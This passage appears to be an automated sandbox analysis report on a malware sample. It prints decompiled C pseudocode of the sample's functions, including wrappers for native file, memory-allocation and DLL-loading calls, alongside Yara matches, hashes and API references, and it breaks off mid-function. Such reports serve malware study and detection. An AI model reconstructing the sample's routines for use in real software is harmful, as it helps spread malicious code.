                                                                                                                				__esi[0xb8] = 0;
                                                                                                                				_t30 = E00404FA4(0x338, __esi);
                                                                                                                				_push(0x14);
                                                                                                                				__esi[0xcb] = 0;
                                                                                                                				__esi[0xa6] = 0;
                                                                                                                				__esi[0xb9] = 0;
                                                                                                                				__esi[0xba] = 0xfff;
                                                                                                                				__esi[8] = 0;
                                                                                                                				__esi[1] = 0;
                                                                                                                				__esi[0xb7] = 1;
                                                                                                                				L0040B26C();
                                                                                                                				if(_t30 == 0) {
                                                                                                                					_t30 = 0;
                                                                                                                				} else {
                                                                                                                					_t30[4] = 0;
                                                                                                                					_t30[0x10] = 0;
                                                                                                                					_t30[8] = 0;
                                                                                                                					_t30[0xc] = 0x100;
                                                                                                                					 *_t30 = 0;
                                                                                                                				}
                                                                                                                				_push(0x14);
                                                                                                                				_t39[2] = _t30;
                                                                                                                				L0040B26C();
                                                                                                                				if(_t30 == 0) {
                                                                                                                					_t30 = 0;
                                                                                                                				} else {
                                                                                                                					_t30[4] = 0;
                                                                                                                					_t30[0x10] = 0;
                                                                                                                					_t30[8] = 0;
                                                                                                                					_t30[0xc] = 0x100;
                                                                                                                					 *_t30 = 0;
                                                                                                                				}
                                                                                                                				_push(0x14);
                                                                                                                				_t39[3] = _t30;
                                                                                                                				L0040B26C();
                                                                                                                				if(_t30 == 0) {
                                                                                                                					_t30 = 0;
                                                                                                                				} else {
                                                                                                                					_t30[4] = 0;
                                                                                                                					_t30[0x10] = 0;
                                                                                                                					_t30[8] = 0;
                                                                                                                					_t30[0xc] = 0x100;
                                                                                                                					 *_t30 = 0;
                                                                                                                				}
                                                                                                                				_push(0x14);
                                                                                                                				_t39[4] = _t30;
                                                                                                                				L0040B26C();
                                                                                                                				if(_t30 == 0) {
                                                                                                                					_t30 = 0;
                                                                                                                				} else {
                                                                                                                					_t30[4] = 0;
                                                                                                                					_t30[0x10] = 0;
                                                                                                                					_t30[8] = 0;
                                                                                                                					_t30[0xc] = 0x100;
                                                                                                                					 *_t30 = 0;
                                                                                                                				}
                                                                                                                				_t39[5] = _t30;
                                                                                                                				return _t39;
                                                                                                                			}






                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: ??2@$memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 1860491036-0
                                                                                                                • Opcode ID: e85a19cc904d935af36f35088f158f19d60a259a6de7382aef0aa8ca398aac1e
                                                                                                                • Instruction ID: f950f85206354bd8a0b3bb5dce35e971dba3beadb745d31d99e8bf3535aee89b
                                                                                                                • Opcode Fuzzy Hash: e85a19cc904d935af36f35088f158f19d60a259a6de7382aef0aa8ca398aac1e
                                                                                                                • Instruction Fuzzy Hash: F121D4B0A007008FD7219F2AC448956FBE8FF90314B2689BFD15ADB2B1D7B89441DF18
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E004054DF(signed int* __eax, void* __ecx, wchar_t* _a4) {
                                                                                                                				int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				void* __edi;
                                                                                                                				int _t32;
                                                                                                                				intOrPtr _t33;
                                                                                                                				intOrPtr _t36;
                                                                                                                				signed int _t48;
                                                                                                                				signed int _t58;
                                                                                                                				signed int _t59;
                                                                                                                				void** _t62;
                                                                                                                				void** _t63;
                                                                                                                				signed int* _t66;
                                                                                                                
                                                                                                                				_t66 = __eax;
                                                                                                                				_t32 = wcslen(_a4);
                                                                                                                				_t48 =  *(_t66 + 4);
                                                                                                                				_t58 = _t48 + _t32;
                                                                                                                				_v12 = _t58;
                                                                                                                				_t59 = _t58 + 1;
                                                                                                                				_v8 = _t32;
                                                                                                                				_t33 =  *((intOrPtr*)(_t66 + 0x14));
                                                                                                                				 *(_t66 + 4) = _t59;
                                                                                                                				_t62 = _t66 + 0x10;
                                                                                                                				if(_t59 != 0xffffffff) {
                                                                                                                					E00404951(_t66, _t59, _t62, 2, _t33);
                                                                                                                				} else {
                                                                                                                					free( *_t62);
                                                                                                                				}
                                                                                                                				_t60 =  *(_t66 + 0x1c);
                                                                                                                				_t36 =  *((intOrPtr*)(_t66 + 0x18));
                                                                                                                				_t63 = _t66 + 0xc;
                                                                                                                				if( *(_t66 + 0x1c) != 0xffffffff) {
                                                                                                                					E00404951(_t66 + 8, _t60, _t63, 4, _t36);
                                                                                                                				} else {
                                                                                                                					free( *_t63);
                                                                                                                				}
                                                                                                                				memcpy( *(_t66 + 0x10) + _t48 * 2, _a4, _v8 + _v8);
                                                                                                                				 *((short*)( *(_t66 + 0x10) + _v12 * 2)) =  *( *(_t66 + 0x10) + _v12 * 2) & 0x00000000;
                                                                                                                				 *( *_t63 +  *(_t66 + 0x1c) * 4) = _t48;
                                                                                                                				 *(_t66 + 0x1c) =  *(_t66 + 0x1c) + 1;
                                                                                                                				_t30 =  *(_t66 + 0x1c) - 1; // -1
                                                                                                                				return _t30;
                                                                                                                			}
















                                                                                                                APIs
                                                                                                                • wcslen.MSVCRT ref: 004054EC
                                                                                                                • free.MSVCRT(?,00000001,?,00000000,?,?,?,00405830,?,00000000,?,00000000), ref: 0040550F
                                                                                                                  • Part of subcall function 00404951: malloc.MSVCRT ref: 0040496D
                                                                                                                  • Part of subcall function 00404951: memcpy.MSVCRT ref: 00404985
                                                                                                                  • Part of subcall function 00404951: free.MSVCRT(00000000,00000000,?,004055BF,00000002,?,00000000,?,004057E1,00000000,?,00000000), ref: 0040498E
                                                                                                                • free.MSVCRT(?,00000001,?,00000000,?,?,?,00405830,?,00000000,?,00000000), ref: 00405532
                                                                                                                • memcpy.MSVCRT ref: 00405556
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: free$memcpy$mallocwcslen
                                                                                                                • String ID:
                                                                                                                • API String ID: 726966127-0
                                                                                                                • Opcode ID: 5c7b7bb3817ea86daae365c80c5e036228049141d00745b32d160c1d254800f2
                                                                                                                • Instruction ID: a1978c74b5bce8e8bf6bff77aa8c6c4d26791a9d8288a70caf523018dd8727ee
                                                                                                                • Opcode Fuzzy Hash: 5c7b7bb3817ea86daae365c80c5e036228049141d00745b32d160c1d254800f2
                                                                                                                • Instruction Fuzzy Hash: 14216FB1500704EFC720DF68D881C9BB7F5EF483247208A6EF456A7691D735B9158B98
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 81%
                                                                                                                			E00405ADF() {
                                                                                                                				void* _t25;
                                                                                                                				signed int _t27;
                                                                                                                				signed int _t29;
                                                                                                                				signed int _t31;
                                                                                                                				signed int _t33;
                                                                                                                				signed int _t50;
                                                                                                                				signed int _t52;
                                                                                                                				signed int _t54;
                                                                                                                				signed int _t56;
                                                                                                                				intOrPtr _t60;
                                                                                                                
                                                                                                                				_t60 =  *0x41c470;
                                                                                                                				if(_t60 == 0) {
                                                                                                                					_t50 = 2;
                                                                                                                					 *0x41c470 = 0x8000;
                                                                                                                					_t27 = 0x8000 * _t50;
                                                                                                                					 *0x41c474 = 0x100;
                                                                                                                					 *0x41c478 = 0x1000;
                                                                                                                					_push( ~(0 | _t60 > 0x00000000) | _t27);
                                                                                                                					L0040B26C();
                                                                                                                					 *0x41c458 = _t27;
                                                                                                                					_t52 = 4;
                                                                                                                					_t29 =  *0x41c474 * _t52;
                                                                                                                					_push( ~(0 | _t60 > 0x00000000) | _t29);
                                                                                                                					L0040B26C();
                                                                                                                					 *0x41c460 = _t29;
                                                                                                                					_t54 = 4;
                                                                                                                					_t31 =  *0x41c474 * _t54;
                                                                                                                					_push( ~(0 | _t60 > 0x00000000) | _t31);
                                                                                                                					L0040B26C();
                                                                                                                					 *0x41c464 = _t31;
                                                                                                                					_t56 = 2;
                                                                                                                					_t33 =  *0x41c478 * _t56;
                                                                                                                					_push( ~(0 | _t60 > 0x00000000) | _t33);
                                                                                                                					L0040B26C();
                                                                                                                					 *0x41c45c = _t33;
                                                                                                                					return _t33;
                                                                                                                				}
                                                                                                                				return _t25;
                                                                                                                			}














                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: ??2@
                                                                                                                • String ID:
                                                                                                                • API String ID: 1033339047-0
                                                                                                                • Opcode ID: fe94db315f44a6ad13eaa6f5e90a6aac049872e3421695f41c948c22f86c7b92
                                                                                                                • Instruction ID: f2da1691ca32ceef4ebb7ffb039160a3052a1a0853e807cf512b268ff05fa3b0
                                                                                                                • Opcode Fuzzy Hash: fe94db315f44a6ad13eaa6f5e90a6aac049872e3421695f41c948c22f86c7b92
                                                                                                                • Instruction Fuzzy Hash: 850121B12C63005EE758DB38EDAB77A36A4E748754F00913EA146CE1F5EB7454408E4C
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Executed Functions

                                                                                                                C-Code - Quality: 37%
                                                                                                                			E00419FF0(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
                                                                                                                				void* _t18;
                                                                                                                				void* _t27;
                                                                                                                				intOrPtr* _t28;
                                                                                                                
                                                                                                                				_t13 = _a4;
                                                                                                                				_t28 = _a4 + 0xc48;
                                                                                                                				E0041AB40(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                                                                                                                				_t6 =  &_a32; // 0x414d52
                                                                                                                				_t12 =  &_a8; // 0x414d52
                                                                                                                				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
                                                                                                                				return _t18;
                                                                                                                			}







                                                                                                                APIs
                                                                                                                • NtReadFile.NTDLL(RMA,5EB6522D,FFFFFFFF,00414A11,?,?,RMA,?,00414A11,FFFFFFFF,5EB6522D,00414D52,?,00000000), ref: 0041A035
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.372523028.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FileRead
                                                                                                                • String ID: RMA$RMA
                                                                                                                • API String ID: 2738559852-4212641106
                                                                                                                • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                                • Instruction ID: 47391d639efac316311ffb50b35ad37227ecba0ab777e9e89f8ea37865c82293
                                                                                                                • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                                • Instruction Fuzzy Hash: 86F0A4B2200208ABCB14DF89DC91EEB77ADAF8C754F158249BA1D97241D634E8518BA4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E0040ACD0(void* __eflags, void* _a4, intOrPtr _a8) {
                                                                                                                				char* _v8;
                                                                                                                				struct _EXCEPTION_RECORD _v12;
                                                                                                                				struct _OBJDIR_INFORMATION _v16;
                                                                                                                				char _v536;
                                                                                                                				void* _t15;
                                                                                                                				struct _OBJDIR_INFORMATION _t17;
                                                                                                                				struct _OBJDIR_INFORMATION _t18;
                                                                                                                				void* _t30;
                                                                                                                				void* _t31;
                                                                                                                				void* _t32;
                                                                                                                
                                                                                                                				_v8 =  &_v536;
                                                                                                                				_t15 = E0041C840( &_v12, 0x104, _a8);
                                                                                                                				_t31 = _t30 + 0xc;
                                                                                                                				if(_t15 != 0) {
                                                                                                                					_t17 = E0041CC60(__eflags, _v8);
                                                                                                                					_t32 = _t31 + 4;
                                                                                                                					__eflags = _t17;
                                                                                                                					if(_t17 != 0) {
                                                                                                                						E0041CEE0( &_v12, 0);
                                                                                                                						_t32 = _t32 + 8;
                                                                                                                					}
                                                                                                                					_t18 = E0041B080(_v8);
                                                                                                                					_v16 = _t18;
                                                                                                                					__eflags = _t18;
                                                                                                                					if(_t18 == 0) {
                                                                                                                						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
                                                                                                                						return _v16;
                                                                                                                					}
                                                                                                                					return _t18;
                                                                                                                				} else {
                                                                                                                					return _t15;
                                                                                                                				}
                                                                                                                			}














                                                                                                                APIs
                                                                                                                • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD42
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.372523028.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Load
                                                                                                                • String ID:
                                                                                                                • API String ID: 2234796835-0
                                                                                                                • Opcode ID: 1c6cec20b9f88e12bdd3a4567b9f8da9e71c9cda0b0e130cedf75b22a9c9a6c7
                                                                                                                • Instruction ID: aaafee299be000192330cf74775bd8359abf95cc5c4a35aabfb05e746359e07b
                                                                                                                • Opcode Fuzzy Hash: 1c6cec20b9f88e12bdd3a4567b9f8da9e71c9cda0b0e130cedf75b22a9c9a6c7
                                                                                                                • Instruction Fuzzy Hash: 390152B5D4020DA7DB10EBA5DC82FDEB7789B54308F0041A9E908A7281F634EB548B95
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00419F40(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                                                                                                				long _t21;
                                                                                                                				void* _t31;
                                                                                                                
                                                                                                                				_t3 = _a4 + 0xc40; // 0xc40
                                                                                                                				E0041AB40(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                                                                                                                				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                                                                                                				return _t21;
                                                                                                                			}






                                                                                                                APIs
                                                                                                                • NtCreateFile.NTDLL(00000060,00409CD3,?,00414B97,00409CD3,FFFFFFFF,?,?,FFFFFFFF,00409CD3,00414B97,?,00409CD3,00000060,00000000,00000000), ref: 00419F8D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.372523028.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateFile
                                                                                                                • String ID:
                                                                                                                • API String ID: 823142352-0
                                                                                                                • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                                • Instruction ID: 8ea736774ba8911b8279b9cfd49072e0c789f2d5db859ac2b7c7e6ef757ed24e
                                                                                                                • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                                • Instruction Fuzzy Hash: E6F0BDB2205208ABCB08CF89DC95EEB77ADAF8C754F158248BA0D97241C630F8518BA4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 68%
                                                                                                                			E0041A11A(intOrPtr __eax, void* __ecx, intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                                                                                                				long _t15;
                                                                                                                				void* _t24;
                                                                                                                
                                                                                                                				asm("stc");
                                                                                                                				asm("cmpsb");
                                                                                                                				 *0x8bec8b55 = __eax;
                                                                                                                				_t11 = _a4;
                                                                                                                				_t3 = _t11 + 0xc60; // 0xca0
                                                                                                                				E0041AB40(_t24, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                                                                                                				_t15 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                                                                                                				return _t15;
                                                                                                                			}






                                                                                                                APIs
                                                                                                                • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AD14,?,00000000,?,00003000,00000040,00000000,00000000,00409CD3), ref: 0041A159
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.372523028.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: AllocateMemoryVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 2167126740-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E0041A120(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                                                                                                				long _t14;
                                                                                                                				void* _t21;
                                                                                                                
                                                                                                                				_t3 = _a4 + 0xc60; // 0xca0
                                                                                                                				E0041AB40(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                                                                                                				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                                                                                                				return _t14;
                                                                                                                			}






                                                                                                                APIs
                                                                                                                • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AD14,?,00000000,?,00003000,00000040,00000000,00000000,00409CD3), ref: 0041A159
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.372523028.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: AllocateMemoryVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 2167126740-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E0041A06C(intOrPtr _a4, void* _a8) {
                                                                                                                				long _t9;
                                                                                                                				void* _t12;
                                                                                                                
                                                                                                                				_t6 = _a4;
                                                                                                                				_t2 = _t6 + 0x10; // 0x300
                                                                                                                				_t3 = _t6 + 0xc50; // 0x40a923
                                                                                                                				E0041AB40(_t12, _a4, _t3,  *_t2, 0, 0x2c);
                                                                                                                				_t9 = NtClose(_a8); // executed
                                                                                                                				return _t9;
                                                                                                                			}






                                                                                                                APIs
                                                                                                                • NtClose.NTDLL(00414D30,?,?,00414D30,00409CD3,FFFFFFFF), ref: 0041A095
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.372523028.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Close
                                                                                                                • String ID:
                                                                                                                • API String ID: 3535843008-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E0041A070(intOrPtr _a4, void* _a8) {
                                                                                                                				long _t8;
                                                                                                                				void* _t11;
                                                                                                                
                                                                                                                				_t5 = _a4;
                                                                                                                				_t2 = _t5 + 0x10; // 0x300
                                                                                                                				_t3 = _t5 + 0xc50; // 0x40a923
                                                                                                                				E0041AB40(_t11, _a4, _t3,  *_t2, 0, 0x2c);
                                                                                                                				_t8 = NtClose(_a8); // executed
                                                                                                                				return _t8;
                                                                                                                			}






                                                                                                                APIs
                                                                                                                • NtClose.NTDLL(00414D30,?,?,00414D30,00409CD3,FFFFFFFF), ref: 0041A095
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.372523028.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Close
                                                                                                                • String ID:
                                                                                                                • API String ID: 3535843008-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.372523028.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 55%
                                                                                                                			E004082E8(signed int __eax, intOrPtr _a4, long _a8) {
                                                                                                                				char _v67;
                                                                                                                				char _v68;
                                                                                                                				void* _t19;
                                                                                                                				int _t20;
                                                                                                                				long _t27;
                                                                                                                				int _t32;
                                                                                                                				void* _t35;
                                                                                                                				void* _t37;
                                                                                                                				void* _t42;
                                                                                                                
                                                                                                                				asm("pushfd");
                                                                                                                				asm("cmpsd");
                                                                                                                				 *((char*)(_t37 + __eax * 4 - 0x43)) =  *((char*)(_t37 + __eax * 4 - 0x43)) + 1;
                                                                                                                				asm("wait");
                                                                                                                				asm("adc eax, 0x83ec8b55");
                                                                                                                				_t35 = _t37;
                                                                                                                				_v68 = 0;
                                                                                                                				E0041BA50( &_v67, 0, 0x3f);
                                                                                                                				E0041C5F0( &_v68, 3);
                                                                                                                				_t19 = E0040ACD0(_t42, _a4 + 0x1c,  &_v68); // executed
                                                                                                                				_t20 = E00414E30(_a4 + 0x1c, _t19, 0, 0, 0xc4e7b6d6);
                                                                                                                				_t32 = _t20;
                                                                                                                				if(_t32 != 0) {
                                                                                                                					_t27 = _a8;
                                                                                                                					_t20 = PostThreadMessageW(_t27, 0x111, 0, 0); // executed
                                                                                                                					_t44 = _t20;
                                                                                                                					if(_t20 == 0) {
                                                                                                                						_t20 =  *_t32(_t27, 0x8003, _t35 + (E0040A460(_t44, 1, 8) & 0x000000ff) - 0x40, _t20);
                                                                                                                					}
                                                                                                                				}
                                                                                                                				return _t20;
                                                                                                                			}

                                                                                                                APIs
                                                                                                                • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.372523028.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: MessagePostThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 1836367815-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 82%
                                                                                                                			E004082F0(void* __eflags, intOrPtr _a4, long _a8) {
                                                                                                                				char _v67;
                                                                                                                				char _v68;
                                                                                                                				void* _t12;
                                                                                                                				intOrPtr* _t13;
                                                                                                                				int _t14;
                                                                                                                				long _t21;
                                                                                                                				intOrPtr* _t25;
                                                                                                                				void* _t26;
                                                                                                                				void* _t30;
                                                                                                                
                                                                                                                				_t30 = __eflags;
                                                                                                                				_v68 = 0;
                                                                                                                				E0041BA50( &_v67, 0, 0x3f);
